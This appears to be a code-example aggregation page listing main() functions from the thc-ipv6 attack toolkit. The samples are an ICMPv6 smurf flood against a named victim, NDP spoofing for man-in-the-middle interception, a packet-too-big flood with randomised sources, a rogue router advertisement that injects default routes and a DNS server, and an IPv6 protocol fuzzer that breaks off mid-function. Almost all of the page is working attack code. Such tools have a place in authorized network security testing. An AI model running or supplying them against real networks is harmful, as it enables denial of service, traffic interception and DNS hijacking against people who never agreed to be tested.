예제 #1
0
int main(int argc, char *argv[]) {
  int i;
  char *glob;

  if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stderr, NULL, _IONBF, 0);
  
  while ((i = getopt(argc, argv, "Dsm:R:")) >= 0) {
    switch (i) {
    case 'm':
      maxhop = atoi(optarg);
      break;
    case 'D':
      do_dst = 1;
      break;
    case 's':
      noverb = 1;
      break;
    case 'R':
      if ((ll = index(optarg, '/')) != NULL)
        *ll = 0;
      replace = thc_resolve6(optarg);
      break;
    default:
      fprintf(stderr, "Error: invalid option %c\n", i);
      exit(-1);
    }
  }

  if (argc - optind < 1 || argc - optind > 2)
    help(argv[0]);
  
  interface = argv[optind];
  if (argc == optind + 2)
    script = argv[optind + 1];

  memset(d, 0, sizeof(d));
  _thc_ipv6_showerrors = 0;

  // we dont want our own address in the discovered addresses
  glob = thc_get_own_ipv6(interface, NULL, PREFER_GLOBAL);
  ll = thc_get_own_ipv6(interface, NULL, PREFER_LINK);
  memcpy(hostpart, ll + 8, 8);
  if (memcmp(ll + 8, glob + 8, 8) != 0) { // do we have a global address with a different host part?
    memcpy(d[0], glob, 16);
    dcnt = 1;
  }
  
  if (do_dst < 255 && do_dst)
    fprintf(stderr, "Warning: it does not make sense to use the -m and -D options together!\n");

  if (noverb == 0)
    printf("Started IPv6 passive system detection (Press Control-C to end) ...\n");
  return thc_pcap_function(interface, "ip6", (char *) detect, 1, NULL);

  return 0; // never reached
}
예제 #2
0
파일: smurf6.c 프로젝트: BwRy/thc-ipv6
int main(int argc, char *argv[]) {
  unsigned char *pkt = NULL, buf[16], fakemac[7] = "\x00\x00\xde\xad\xbe\xef";
  unsigned char *multicast6, *victim6;
  int pkt_len = 0;
  char *interface;
  int rawmode = 0;

  if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  if (strcmp(argv[1], "-r") == 0) {
    thc_ipv6_rawmode(1);
    rawmode = 1;
    argv++;
    argc--;
  }

  interface = argv[1];
  if (thc_get_own_ipv6(interface, NULL, PREFER_GLOBAL) == NULL) {
    fprintf(stderr, "Error: invalid interface %s\n", interface);
    exit(-1);
  }
  victim6 = thc_resolve6(argv[2]);
  if (argv[3] != NULL)
    multicast6 = thc_resolve6(argv[3]);
  else
    multicast6 = thc_resolve6("ff02::1");

  memset(buf, 'A', 16);
  if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, victim6, multicast6, 0, 0, 0, 0, 0)) == NULL)
    return -1;
  if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &buf, 16, 0) < 0)
    return -1;
  if (thc_generate_pkt(interface, fakemac, NULL, pkt, &pkt_len) < 0) {
    fprintf(stderr, "Error: Can not generate packet, exiting ...\n");
    exit(-1);
  }

  printf("Starting smurf6 attack against %s (Press Control-C to end) ...\n", argv[2]);
  while (1)
    thc_send_pkt(interface, pkt, &pkt_len);

  return 0;
}
예제 #3
0
파일: spoofer.c 프로젝트: 0x0mar/thc-ipv6
int main(int argc, char *argv[]) {

  if (argc < 4) {
    printf("code by Fabricio Nogueira Buzeto and Carlos Botelho De Paula Filho\nCode based on thc-ipv6\n\n");
    printf("Syntax: %s interface target1 target2\n\n", argv[0]);
    printf("NDP spoof between target1 and target2 to perform a man-in-the-middle attack.\n");
    exit(-1);
  }

  memset((char*)&mArgs, 0, sizeof(mArgs));
  mArgs.interface = argv[1];
  mArgs.ipAddrVic1 = thc_resolve6(argv[2]);
  mArgs.macAddrVic1 = thc_get_mac(argv[1], NULL, mArgs.ipAddrVic1);
  mArgs.ownMac = thc_get_own_mac(argv[1]);
  mArgs.ownIp = thc_get_own_ipv6(argv[1], mArgs.ipAddrVic1, PREFER_LINK);
  mArgs.twoVics = 1;
  mArgs.ipAddrVic2 = thc_resolve6(argv[3]);
  mArgs.macAddrVic2 = thc_get_mac(argv[1], NULL, mArgs.ipAddrVic2);

  if (mArgs.ownIp == NULL) {
    fprintf(stderr, "ERROR: Invalid interface: %s\n", argv[1]);
    exit(-1);
  }
  if (mArgs.macAddrVic1 == NULL) {
    fprintf(stderr, "ERROR: Invalid target1: %s\n", argv[2]);
    exit(-1);
  }
  if (mArgs.macAddrVic2 == NULL) {
    fprintf(stderr, "ERROR: Invalid target2: %s\n", argv[3]);
    exit(-1);
  }
  
  spoofer(mArgs);
  
  printf("\nPress Control-C to end MITM spoofing...\n");
  while(1) sleep(1);
}
예제 #4
0
int main(int argc, char *argv[]) {
  char *interface, *ptr, buf2[8];
  unsigned char *dst = NULL, *dstmac = NULL, *src = NULL, *srcmac = NULL;
  int i, offset = 14, type = ICMP6_TOOBIG, alert = 0, randsrc = 0, do_crc = 1, maxsize = 160;
  unsigned char *pkt = NULL, ip6[8];
  int pkt_len = 0, count = 0;
  thc_ipv6_hdr *hdr;
  unsigned int filler = IDS_STRING, mychecksum;
  unsigned char offender[1452] = { 0x60, 0x00, 0x00, 0x00, 0x01, 0xcd, 0x3a, 0x3f,
                               0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
                               0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
                               0x20, 0x03, 0x00, 0x04, 0x00, 0x04, 0x00, 0x04,
                               0x00, 0x04, 0x00, 0x04, 0x00, 0x04, 0x00, 0x04,
                               0x80, 0x00, 0xed, 0xc5, 0xfa, 0xce, 0xba, 0xbe,
                               0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
                               0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
                               0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
                               0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
                               0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
                               0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
                               0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
                               0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
                               0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
                               0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
                               0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
                               0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
                               0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
                               0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41 };

  if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  srand(time(NULL) + getpid());
  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stderr, NULL, _IONBF, 0);
  
   while ((i = getopt(argc, argv, "acpPTUrRs:m")) >= 0) {
     switch(i) {
       case 'a':
         alert = 8;
         break;
       case 'c':
         do_crc = 0;
         break;
       case 'm':
         maxsize = -1;
         break;
       case 'p':
         type = ICMP6_ECHOREQUEST;
         break;
       case 'P':
         type = ICMP6_ECHOREPLY;
         break;
       case 'T':
         type = ICMP6_TTLEXEED;
         break;
       case 'U':
         type = ICMP6_UNREACH;
         break;
       case 'r':
         randsrc = 8;
         break;
       case 'R':
         randsrc = 1;
         break;
       case 's':
         src = thc_resolve6(optarg);
         break;
       default:
         fprintf(stderr, "Error: unknown option -%c\n", i);
         exit(-1);
     }
   }

  if (argc - optind < 2)
    help(argv[0]);

  interface = argv[optind];

  if ((ptr = index(argv[optind + 1], '/')) != NULL)
    *ptr = 0;
  if ((dst = thc_resolve6(argv[optind + 1])) == NULL) {
    fprintf(stderr, "Error: Can not resolve %s\n", argv[optind + 1]);
    exit(-1);
  }

  if ((srcmac = thc_get_own_mac(interface)) == NULL) {
    fprintf(stderr, "Error: invalid interface %s\n", interface);
    exit(-1);
  }
  
  if (src == NULL)
    if ((src = thc_get_own_ipv6(interface, dst, PREFER_GLOBAL)) == NULL || (src[0] == 0xfe && src[1] == 0x80)) {
      fprintf(stderr, "Error: no global IPv6 address configured on interface %s\n", interface);
      exit(-1);
    }
  
  if ((dstmac = thc_get_mac(interface, src, dst)) == NULL) {
    fprintf(stderr, "Error: can not find a route to target %s\n", argv[2]);
    exit(-1);
  }
  
  if (maxsize == -1)
    maxsize = thc_get_mtu(interface) - 48 - alert;

  if (maxsize > sizeof(offender))
    maxsize = sizeof(offender);

  for (i = 0; i < ((sizeof(offender) - 48) / 4); i++)
    memcpy(offender + 48 + i*4, (char*) &filler + _TAKE4, 4);
  memcpy(offender + 8, dst, 16);

  if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 255, 0, 0, 0, 0)) == NULL)
    return -1;
  if (alert) {
    memset(buf2, 0, sizeof(buf2));
    buf2[0] = 5;
    buf2[1] = 2;
    if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf2, 6) < 0)
      return -1;
  }
  if (thc_add_icmp6(pkt, &pkt_len, type, 0, 1280, offender, maxsize, 0) < 0)
    return -1;
  if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
    return -1;
  hdr = (thc_ipv6_hdr *) pkt;
  
  if (do_hdr_size)
    offset = do_hdr_size;

  printf("Starting to flood target network with toobig %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface);
  while (1) {

    for (i = 4; i < 8; i++)
      ip6[i] = rand() % 256;

    memcpy(hdr->pkt + offset + 32 + 4, ip6 + 4, 4);
    memcpy(hdr->pkt + offset + 40 + 8 + 8 + 8 + 4 + alert, ip6 + 4, 4);
    
    if (randsrc) {
      for (i = randsrc; i < 16; i++)
        hdr->pkt[offset + 8 + i] = rand() % 256;
    }
    
    if (do_crc) {
      hdr->pkt[offset + 42 + alert] = 0;
      hdr->pkt[offset + 43 + alert] = 0;
      mychecksum = checksum_pseudo_header(hdr->pkt + offset + 8, hdr->pkt + offset + 24, NXT_ICMP6, hdr->pkt + offset + 40 + alert, pkt_len - offset - 40 - alert);
      hdr->pkt[offset + 42 + alert] = mychecksum / 256;
      hdr->pkt[offset + 43 + alert] = mychecksum % 256;
    }

    while (thc_send_pkt(interface, pkt, &pkt_len) < 0)
      usleep(1);

    count++;
    if (count % 1000 == 0)
      printf(".");
  }
  return 0;
}
예제 #5
0
int main(int argc, char *argv[]) {
  char *routerip, *interface, mac[16] = "";
  unsigned char *routerip6, *route6, *mac6 = mac, *ip6;
  unsigned char buf[512], *ptr, buf2[6], string[] = "ip6 and icmp6 and dst ff02::2";
  unsigned char *dst = thc_resolve6("ff02::1");
  unsigned char *dstmac = thc_get_multicast_mac(dst);
  unsigned char *dns;
  int size, mtu = 1500, i, j, k, cnt;
  unsigned char *pkt = NULL;
  int pkt_len = 0;
  int rawmode = 0;
  pcap_t *p;

  if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  while ((i = getopt(argc, argv, "FHDr")) >= 0) {
    switch (i) {
    case 'r':
      thc_ipv6_rawmode(1);
      rawmode = 1;
      break;
    case 'F':
      do_frag++;
      break;
    case 'H':
      do_hop = 1;
      break;
    case 'D':
      do_dst = 1;
      break;
    default:
      fprintf(stderr, "Error: invalid option %c\n", i);
      exit(-1);
    }
  }

  if (argc - optind < 2)
    help(argv[0]);

  if (do_hdr_size)
    myoff = do_hdr_size;
  frbuf = buf;
  frbuf2 = buf2;
  frbuf2len = sizeof(buf2);
  memset(mac, 0, sizeof(mac));
  interface = argv[optind];
  mtu = thc_get_mtu(interface);
  if (argc - optind >= 5)
    mtu = atoi(argv[optind + 4]);
  if (argc - optind >= 7 && (ptr = argv[optind + 5]) != NULL)
    sscanf(ptr, "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4],
           (unsigned int *) &mac[5]);
  else
    mac6 = thc_get_own_mac(interface);

  if (argc - optind >= 4 && argv[optind + 3] != NULL)
    ip6 = thc_resolve6(argv[optind + 3]);
  else
    ip6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK);
  frip6 = ip6;
  frint = interface;
  frmac = mac6;

  if (argc - optind >= 4 && argv[optind + 2] != NULL)
    dns = thc_resolve6(argv[optind + 2]);
  else
    dns = thc_resolve6("ff02::fb");

  routerip = argv[optind + 1];
  if (routerip == NULL || (ptr = index(routerip, '/')) == NULL) {
    printf("Error: Option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. ff80::01/16\n");
    exit(-1);
  }
  *ptr++ = 0;
  size = atoi(ptr);

  routerip6 = thc_resolve6(routerip);
  route6 = thc_resolve6(routerip);

  if (routerip6 == NULL || size < 1 || size > 128) {
    fprintf(stderr, "Error: IP-ADDRESS/PREFIXLENGTH argument is invalid: %s\n", argv[optind + 1]);
    exit(-1);
  }
  if (size < 48 || size > 64)
    fprintf(stderr, "Warning: unusual network prefix size defined, be sure what your are doing: %d\n", size);
  if (dns == NULL) {
    fprintf(stderr, "Error: dns argument is invalid: %s\n", argv[optind + 2]);
    exit(-1);
  }
  if (ip6 == NULL) {
    fprintf(stderr, "Error: link-local-ip6 argument is invalid: %s\n", argv[optind + 3]);
    exit(-1);
  }
  if (mtu < 1 || mtu > 65536) {
    fprintf(stderr, "Error: mtu argument is invalid: %s\n", argv[optind + 4]);
    exit(-1);
  }
  if (mtu < 1228 || mtu > 1500)
    fprintf(stderr, "Warning: unusual mtu size defined, be sure what you are doing :%d\n", mtu);
  if (mac6 == NULL) {
    fprintf(stderr, "Error: mac address in invalid\n");
    exit(-1);
  }
  memset(buf, 0, sizeof(buf));
  memset(buf2, 0, sizeof(buf2));
  memset(buf3, 0, sizeof(buf3));

  if ((p = thc_pcap_init(interface, string)) == NULL) {
    fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string);
    exit(-1);
  }

  i = 128 - size;
  j = i / 8;
  k = i % 8;
  if (k > 0)
    j++;
  memset(route6 + 16 - j, 0, j);
  if (k > 0)
    route6[17 - j] = (route6[17 - j] >> (8 - k)) << (8 - k);

//  buf[3] = 250; // 0-3: reachable timer
  buf[6] = 4;                   // 4-7: retrans timer
  // option mtu
  buf[8] = 5;
  buf[9] = 1;
  buf[12] = mtu / 16777216;
  buf[13] = (mtu % 16777216) / 65536;
  buf[14] = (mtu % 65536) / 256;
  buf[15] = mtu % 256;
  // option prefix
  buf[16] = 3;
  buf[17] = 4;
  buf[18] = size;               // prefix length
  buf[19] = 128 + 64;
  memset(&buf[20], 17, 4);
  memset(&buf[24], 4, 4);
  memcpy(&buf[32], route6, 16);

  i = 48;
  // mac address option
  buf[i++] = 1;
  buf[i++] = 1;
  memcpy(buf + i, mac6, 6);
  i += 6;

  // default route routing option
  buf[i++] = 0x18;              // routing entry option type
  buf[i++] = 0x03;              // length 3 == 24 bytes
  buf[i++] = 0x00;              // prefix length
  buf[i++] = 0x08;              // priority, highest of course
  i += 2;                       // 52-53 unknown
  buf[i++] = 0x11;              // lifetime, word
  buf[i++] = 0x11;              // lifetime, word
  i += 16;                      // 56-71 address, all zeros for default

  // specific route routing option 2000::/3
  buf[i++] = 0x18;              // routing entry option type
  buf[i++] = 0x03;              // length 3 == 24 bytes
  buf[i++] = 0x03;              // prefix length
  buf[i++] = 0x08;              // priority, highest of course
  i += 2;                       // 52-53 unknown
  buf[i++] = 0x11;              // lifetime, word
  buf[i++] = 0x11;              // lifetime, word
  buf[i++] = 0x20;              // 56-71 address: 2000::
  i += 15;

  // specific route routing option 2000::/3
  buf[i++] = 0x18;              // routing entry option type
  buf[i++] = 0x03;              // length 3 == 24 bytes
  buf[i++] = 0x07;              // prefix length
  buf[i++] = 0x08;              // priority, highest of course
  i += 2;                       // 52-53 unknown
  buf[i++] = 0x11;              // lifetime, word
  buf[i++] = 0x11;              // lifetime, word
  buf[i++] = 0xfc;              // 56-71 address: fc::
  i += 15;

  // dns option
  buf[i++] = 0x19;              // dns option type
  buf[i++] = 0x03;              // length
  i += 2;                       // 74-75 reserved
  memset(buf + i, 1, 4);        // validity time
  i += 4;
  memcpy(buf + i, dns, 16);     // dns server
  i += 16;

  frbuflen = i;

  if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0xe0, 0)) == NULL)
    return -1;

  if (do_hop) {
    type = NXT_HBH;
    if (thc_add_hdr_hopbyhop(pkt, &pkt_len, frbuf2, 6) < 0)
      return -1;
  }
  if (do_frag) {
    type = NXT_FRAG;
    for (i = 0; i <= do_frag; i++)
      if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, cnt++) < 0)
        return -1;
  }
  if (do_dst) {
    if (type == NXT_ICMP6)
      type = NXT_DST;
    if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0)
      return -1;
  }
  if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, 0xff080800, buf, i, 0) < 0)
    return -1;
  if (thc_generate_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0)
    return -1;
  frhdr = (thc_ipv6_hdr *) pkt;

  // init pcap

  printf("Starting to advertise router %s (Press Control-C to end) ...\n", argv[optind + 1]);
  while (1) {
    if (do_dst) {
      thc_send_as_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1240);
    } else {
      thc_send_pkt(interface, pkt, &pkt_len);
    }
    while (thc_pcap_check(p, (char *) send_rs_reply, NULL) > 0);
    sleep(5);
  }
  return 0;
}
예제 #6
0
int main(int argc, char *argv[]) {
  unsigned char *pkt = NULL, *pkt_bak, *mcast6, *someaddr6 = NULL;
  unsigned char *dst6, *src6 = NULL, *mac = NULL, *routers[2], string[64] = "ip6 and dst ";
  int test_start = 0, fragment = 0, alert = 0, sroute = 0;
  int do_type = DO_PING, do_alive = 1, hopbyhop = 0, destination = 0, jumbo = 0;
  int pkt_len = 0, offset = 0, test_current = 0, i, j, k, do_fuzz = 1, test_ptr = 0;
  int test_end = TEST_MAX, ping = NEVER, frag_offset = 0, header = 0, no_send = 1;
  int test_pos = 0, test_cnt = 0, do_it, extend = 0, mtu = 1500, size = 64, wait = 0, off2 = 14;
  char *interface, fuzzbuf[256], *srcmac, *dns, *route6, *real_dst6 = NULL;
  unsigned char buf[256], buf2[100], buf3[16];
  unsigned short int *sip;
  pcap_t *p;
  thc_ipv6_hdr *hdr;

  if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  while ((i = getopt(argc, argv, "s:0123456789Xxt:T:p:FSDHRIJan:")) >= 0) {
    switch (i) {
    case 's':
      do_type = DO_TCP;
      port = atoi(optarg);
      break;
    case '0':
      do_type = DO_NODEQUERY;
      break;
    case '1':
      do_type = DO_PING;
      break;
    case '2':
      do_type = DO_NEIGHSOL;
      break;
    case '3':
      do_type = DO_NEIGHADV;
      break;
    case '4':
      do_type = DO_RA;
      break;
    case '5':
      do_type = DO_MLD_REP;
      break;
    case '6':
      do_type = DO_MLD_DONE;
      break;
    case '7':
      do_type = DO_MLD_QUERY;
      wait = 0xff0000;
      break;
    case '8':
      do_type = DO_MLD2_REPORT;
      break;
    case '9':
      do_type = DO_MLD2_QUERY;
      wait = 0xff0000;
      break;
    case 'X':
      do_type = DO_NONE;
      break;
    case 't':
      test_start = atoi(optarg);
      break;
    case 'T':
      test_end = test_start = atoi(optarg);
      break;
    case 'p':
      ping = atoi(optarg);
      break;
    case 'a':
      do_alive = 0;
      break;
    case 'S':
      sroute = 1;
      break;
    case 'n':
      no_send = atoi(optarg);
      break;
    case 'F':
      fragment = 1;
      break;
    case 'R':
      alert = 1;
      break;
    case 'D':
      destination = 1;
      break;
    case 'H':
      hopbyhop = 1;
      break;
    case 'J':
      jumbo = 1;
      break;
    case 'I':
      header = 1;
      break;
    case 'x':
      extend = 1;
      break;
    }
  }
  if (argc - optind < 2) {
    fprintf(stderr, "ERROR: not enough options, interface and target address are required!\n");
    exit(-1);
  }
  interface = argv[optind];
  if ((srcmac = thc_get_own_mac(interface)) == NULL) {
    fprintf(stderr, "ERROR: %s is not a valid interface which has a MAC, use raw mode?\n", interface);
    exit(-1);
  }
  if (no_send < 1) {
    fprintf(stderr, "ERROR: -n number must be between one and 2 billion\n");
    exit(-1);
  }
  if (do_hdr_size) {
    test_pos -= do_hdr_size;
    offset -= do_hdr_size;
    off2 = do_hdr_size;
  }
  if (do_type != DO_PING && do_type != DO_TCP && do_type != DO_NONE) {
    if ((mcast6 = thc_resolve6(argv[optind + 1])) == NULL) {
      fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[optind + 1]);
      exit(-1);
    }

    if (do_type == DO_NEIGHSOL) {
      dst6 = thc_resolve6("ff02::0001:ff00:0000");
      memcpy(dst6 + 13, mcast6 + 13, 3);
    } else
      dst6 = thc_resolve6("ff02::1");
  } else {
    dst6 = thc_resolve6(argv[optind + 1]);
  }
  if (argv[optind + 1] != NULL)
    if ((real_dst6 = thc_resolve6(argv[optind + 1])) == NULL) {
      fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[optind + 1]);
      exit(-1);
    }


  if (interface == NULL || argv[optind + 1] == NULL) {
    printf("Error: interface and target-ipv6-address are mandatory command line options\n");
    exit(-1);
  }
  if (ping < 1 || test_end < test_start) {
    printf("don't f**k up the command line options!\n");
    exit(-1);
  }
  if (argv[optind + 2] != NULL)
    someaddr6 = thc_resolve6(argv[optind + 2]);
  if (argc - optind > 3) {
    printf("Error: too many command line options\n");
    exit(-1);
  }
  if ((mac = thc_get_mac(interface, src6, dst6)) == NULL) {
    fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[2]);
    exit(-1);
  }

  if (do_type == DO_PING || do_type == DO_TCP || do_type == DO_NONE)
    src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL);
  else
    src6 = thc_get_own_ipv6(interface, dst6, PREFER_LINK);
  if (src6 == NULL) {
    fprintf(stderr, "Error: no IPv6 address configured on interface %s\n", interface);
    exit(-1);
  }
  strcat(string, thc_ipv62notation(src6));
  if (sroute) {
    if (someaddr6 != NULL)
      routers[0] = someaddr6;
    else
      routers[0] = dst6;
    routers[1] = NULL;
  }
  setvbuf(stdout, NULL, _IONBF, 0);
  memset(buf, 0, sizeof(buf));
  memset(buf2, 0, sizeof(buf2));
  dns = thc_resolve6("ff02::fb");
  route6 = thc_resolve6("2a01::");

  if ((p = thc_pcap_init(interface, string)) == NULL) {
    fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string);
    exit(-1);
  }
  if (real_dst6 != NULL && real_dst6[0] == 0xff)
    do_alive = 0;
  // ping before to check if it works
  if (do_alive)
    if (check_alive(p, interface, srcmac, mac, src6, real_dst6) == 0) {
      // fprintf(stderr, "Error: target %s is not alive via direct ping6!\n", argv[optind + 1]);
      // exit(-1);
    }
  // generate basic packet
  strcpy(fuzzbuf, fuzztype_ether);
  if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 0, 0, 0, 0, 0)) == NULL)
    return -1;
  if (header)
    strcat(fuzzbuf, fuzztype_ip6);
  else
    strcat(fuzzbuf, fuzztype_ip6no);

  if (alert || hopbyhop || jumbo) {
    memset(buf2, 0, sizeof(buf2));
    i = 0;

    if (alert) {
      buf2[i++] = 5;
      buf2[i++] = 2;
      i += 2;
      strcat(fuzzbuf, ".F.F");
    }

    if (jumbo) {
      buf2[i++] = 0xc2;
      buf2[i++] = 4;
      buf2[i++] = 'J';          // lookup code
      buf2[i++] = 'J';
      buf2[i++] = 'J';
      buf2[i++] = 'J';
      strcat(fuzzbuf, ".FBBBB");
    }

    if (hopbyhop) {
      memset(buf3, 0, sizeof(buf3));
      buf3[0] = 'X';
      buf3[1] = '.';
      for (j = 0; j < 10; j++) {
        buf2[i++] = 1;          // PadN, length
        buf2[i++] = j;
        if (j > 0) {
          memset(buf2 + i, 0xaa, j);
          buf3[2 + j] = '.';
          i += j;
        }
        strcat(fuzzbuf, buf3);  // always: X... for every new option
      }
    }

    if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf2, i) < 0)
      return -1;

    i += 2;
    if (i % 8 > 0)
      i = ((i / 8) + 1) * 8;

    offset += i;
  }

  if (sroute) {
    if (thc_add_hdr_route(pkt, &pkt_len, routers, 1) < 0)
      return -1;
    else {
      strcat(fuzzbuf, "FFFFBBBB................");
      offset += 24;
    }
  }

  if (fragment) {
    frag_offset = offset;
    if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 0, 0) < 0)
      return -1;
    else {
      strcat(fuzzbuf, "FFWW..");
      offset += 8;
    }
  }

  if (destination) {
    memset(buf2, 0, sizeof(buf2));
    memset(buf3, 0, sizeof(buf3));
    buf3[0] = 'X';
    buf3[1] = '.';
    i = 0;
    for (j = 0; j < 10; j++) {
      buf2[i++] = 1;            // PadN, length
      buf2[i++] = j;
      if (j > 0) {
        memset(buf2 + i, 0xaa, j);
        buf3[2 + j] = '.';
        i += j;
      }
      strcat(fuzzbuf, buf3);    // always: X... for every new option
    }

    if (thc_add_hdr_dst(pkt, &pkt_len, buf2, i) < 0)
      return -1;

    i += 2;
    if (i % 8 > 0)
      i = ((i / 8) + 1) * 8;

    offset += i;
  }

  memset(buf, 0, sizeof(buf));
//  if (header)
    strcat(fuzzbuf, fuzztype_icmp6);
//  else
//    strcat(fuzzbuf, fuzztype_icmp6no);
  switch (do_type) {
  case DO_TCP:
    // tcp options
    buf[0] = 2; // max segment size
    buf[1] = 4;
    buf[2] = 255;
    buf[3] = 255;
    buf[4] = 3; // windows size
    buf[5] = 3;
    buf[6] = 62;
    buf[7] = 1; // padding
    buf[8] = 8; // timestamp
    buf[9] = 10;
    buf[10] = time(NULL) / 16777216;
    buf[11] = ((time(NULL) / 65536) % 256);
    buf[12] = ((time(NULL) / 256) % 256);
    buf[13] = time(NULL) % 256;
    // 4 bytes ack tstamp 00000000
    // rest is padding (2 bytes)
    if (thc_add_tcp(pkt, &pkt_len, 65532, port, test_current, 0, TCP_SYN, 5760, 0, (unsigned char *) buf, 20, (unsigned char *) buf, 20) < 0)
      return -1;
    strcat(fuzzbuf, fuzztype_tcp);
    break;

  case DO_PING:
    if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, test_current, (unsigned char *) &buf, 16, 0) < 0)
      return -1;
    strcat(fuzzbuf, fuzztype_icmp6ping);
    break;
    
  case DO_NONE:
    // empty
    break;

  case DO_NEIGHSOL:
    if (someaddr6 != NULL)
      memcpy(buf, someaddr6, 16);
    else
      memcpy(buf, mcast6, 16);
    buf[16] = 1;
    buf[17] = 1;
    memcpy(buf + 18, srcmac, 6);
    if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORSOL, 0, 0, (unsigned char *) &buf, 24, 0) < 0)
      return -1;
    strcat(fuzzbuf, fuzztype_icmp6ns);
    break;

  case DO_NEIGHADV:
    if (someaddr6 != NULL)
      memcpy(buf, someaddr6, 16);
    else
      memcpy(buf, src6, 16);
    buf[16] = 2;
    buf[17] = 1;
    memcpy(buf + 18, srcmac, 6);
    if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORADV, 0, 0xe0000000, (unsigned char *) &buf, 24, 0) < 0)
      return -1;
    strcat(fuzzbuf, fuzztype_icmp6na);
    break;
    
  case DO_NODEQUERY:
    memcpy(buf + 8, real_dst6, 16);
    if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NODEQUERY, 0, 0x0003003e, (unsigned char *) &buf, 24, 0) < 0)
      return -1;
    strcat(fuzzbuf, fuzztype_icmp6nq);
    break;    

  case DO_RA:
    //  buf[3] = 250; // 0-3: reachable timer
    buf[6] = 4;                 // 4-7: retrans timer
    // option mtu
    buf[8] = 5;
    buf[9] = 1;
    buf[12] = mtu / 16777216;

    buf[14] = (mtu % 65536) / 256;
    buf[15] = mtu % 256;
    // option prefix
    buf[16] = 3;
    buf[17] = 4;
    buf[18] = size;             // prefix length
    buf[19] = 128 + 64;
    memset(&buf[20], 17, 4);
    memset(&buf[24], 4, 4);
    if (someaddr6 != NULL)
      memcpy(&buf[32], someaddr6, 16);
    else
      memcpy(&buf[32], route6, 16);

    i = 48;
    // mac address option
    buf[i++] = 1;
    buf[i++] = 1;
    memcpy(buf + i, srcmac, 6);
    i += 6; // = 8 == 56

    // default route routing option
    buf[i++] = 0x18;            // routing entry option type
    buf[i++] = 0x03;            // length 3 == 24 bytes
    buf[i++] = 64;            // prefix length /64
    buf[i++] = 0x08;            // priority, highest of course
    i += 2;                     // 52-53 unknown
    buf[i++] = 0x11;            // lifetime, word
    buf[i++] = 0x11;            // lifetime, word
    buf[i++] = 0x20;
    buf[i++] = 4;               // 56-71 address, 2004:: for default
    i += 14; // = 24 == 70               

    // dns option
    buf[i++] = 0x19;            // dns option type
    buf[i++] = 0x03;            // length
    i += 2;                     // 74-75 reserved
    memset(buf + i, 1, 4);      // validity time
    i += 4;
    if (someaddr6 != NULL)
      memcpy(buf + i, someaddr6, 16);   // dns server
    else
      memcpy(buf + i, dns, 16); // dns server
    i += 16; // = 24 == 94

    // seachlist option
    buf[i++] = 31;
    buf[i++] = 4;
    i += 2;
    memset(buf + i, 1, 4);      // validity time
    i += 4;
    buf[i++] = 3;
    memcpy(buf + i, "foo", 3);
    i += 3;
    buf[i++] = 4;
    memcpy(buf + i, "corp", 4);
    i += 5; // + null byte
    buf[i++] = 5;
    memcpy(buf + i, "local", 5);
    i += 5;
    buf[i++] = 6;
    memcpy(buf + i, "domain", 6);
